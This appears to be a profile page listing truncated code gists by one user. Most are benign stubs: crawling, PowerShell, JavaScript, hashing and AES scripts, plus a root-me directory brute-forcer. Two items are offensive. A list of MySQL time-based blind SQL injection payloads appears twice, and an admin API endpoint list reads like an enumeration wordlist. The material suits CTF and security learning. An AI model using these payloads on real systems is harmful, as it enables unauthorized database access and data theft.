Th3redTea

🐍 Python Crawling Libraries Cheatsheet

---

Library: requests

Use case: Fetch a single page and inspect its HTML.

import requests

# Send a GET request to a page

Th3redTea

/api/admin/certificates
/api/admin/firewall
/api/admin/firewall/rules/1
/api/admin/firewall/rules/10
/api/admin/firewall/rules/2
/api/admin/firewall/rules/3
/api/admin/firewall/rules/4
/api/admin/firewall/rules/5
/api/admin/firewall/rules/6
/api/admin/firewall/rules/7

Th3redTea

0'XOR(if(now()=sysdate(),sleep(5),0))XOR'Z%00
0'XOR(if(now()=sysdate(),sleep(5*1),0))XOR'Z%00
if(now()=sysdate(),sleep(5),0)%00
'XOR(if(now()=sysdate(),sleep(5),0))XOR'%00
'XOR(if(now()=sysdate(),sleep(5*1),0))OR'%00
0'|(IF((now())LIKE(sysdate()),SLEEP(5),0))|'Z%00
0'or(now()=sysdate()&&SLEEP(1))or'Z%00
if(now()=sysdate(),sleep(5),0)/"XOR(if(now()=sysdate(),sleep(5),0))OR"/%00
if(now()=sysdate(),sleep(5),0)/*'XOR(if(now()=sysdate(),sleep(5),0))OR'"XOR(if(now()=sysdate(),sleep(5),0))OR"*/%00
if(now()=sysdate(),sleep(5),0)/'XOR(if(now()=sysdate(),sleep(5),0))OR'"XOR(if(now()=sysdate(),sleep(5),0) and 5=5)"/%00

Th3redTea

0'XOR(if(now()=sysdate(),sleep(5),0))XOR'Z%00
0'XOR(if(now()=sysdate(),sleep(5*1),0))XOR'Z%00
if(now()=sysdate(),sleep(5),0)%00
'XOR(if(now()=sysdate(),sleep(5),0))XOR'%00
'XOR(if(now()=sysdate(),sleep(5*1),0))OR'%00
0'|(IF((now())LIKE(sysdate()),SLEEP(5),0))|'Z%00
0'or(now()=sysdate()&&SLEEP(1))or'Z%00
if(now()=sysdate(),sleep(5),0)/"XOR(if(now()=sysdate(),sleep(5),0))OR"/%00
if(now()=sysdate(),sleep(5),0)/*'XOR(if(now()=sysdate(),sleep(5),0))OR'"XOR(if(now()=sysdate(),sleep(5),0))OR"*/%00
if(now()=sysdate(),sleep(5),0)/'XOR(if(now()=sysdate(),sleep(5),0))OR'"XOR(if(now()=sysdate(),sleep(5),0) and 5=5)"/%00

Th3redTea

Powershell

Hacking with PowerShell

• Powershell is build with .NET Framework. You can execute .NET fucntions from PS. the output of these functions are objectes (somehow object-oriented).
• The normal format of cmdlet is Verb-Noun. Example: Get-Command. Common verbs include: Get / Start / Stop / Read / Write / New / Out.
• learn more about verbs here: https://learn.microsoft.com/en-us/powershell/scripting/developer/cmdlet/approved-verbs-for-windows-powershell-commands?view=powershell-7.3&viewFallbackFrom=powershell-7
• Get-Help and Get-Command is your friend.
• You can use -Example with Get-Help to give an idea of how to use any cmdlet.
• Get-Command print out all the installed cmdlet. It has pattern match. Get-Command Verb-* *-Noun

Th3redTea

Vanilla JavaScript Quick Reference / Cheatsheet

Just migrated it from Codepen.io to markdown. Credit goes to David Conner.

Working with DOM	Working with JS	Working With Functions
Accessing Dom Elements	Add/Remove Array Item	Add Default Arguments to Function
Grab Children/Parent Node(s)	Add/Remove Object Properties	Throttle/Debounce Functions
Create DOM Elements	Conditionals

Th3redTea

#!/usr/bin/python3 

import requests
import re
from bs4 import BeautifulSoup


url= "http://challenge01.root-me.org/web-serveur/ch4/"

#This is a extremly simple directory brute forcer. 

Th3redTea

#!/usr/bin/python3 
import re

def findStuff():
    
    file = open('js.js', 'r') #we open a local file
    Text = file.read() #Give the content of the file to the variable Text


    #Create a RegEx to look for ip addresses. The findall will look for any string that meets the given pattent in the Text

Th3redTea

#!/usr/bin/python
# Python rogram to find the SHA-1 message digest of a file

# importing the hashlib module
import hashlib

def hash_file(filename):
   """"This function returns the SHA-1 hash
   of the file passed into it"""

Th3redTea

#!/usr/bin/python3 

# This is a simple script to encrypt and decrypt files using AES encryption alogorithm #

from Crypto.Hash import SHA256
from  Crypto.Cipher import AES
from Crypto import Random
import sys
import argparse
import os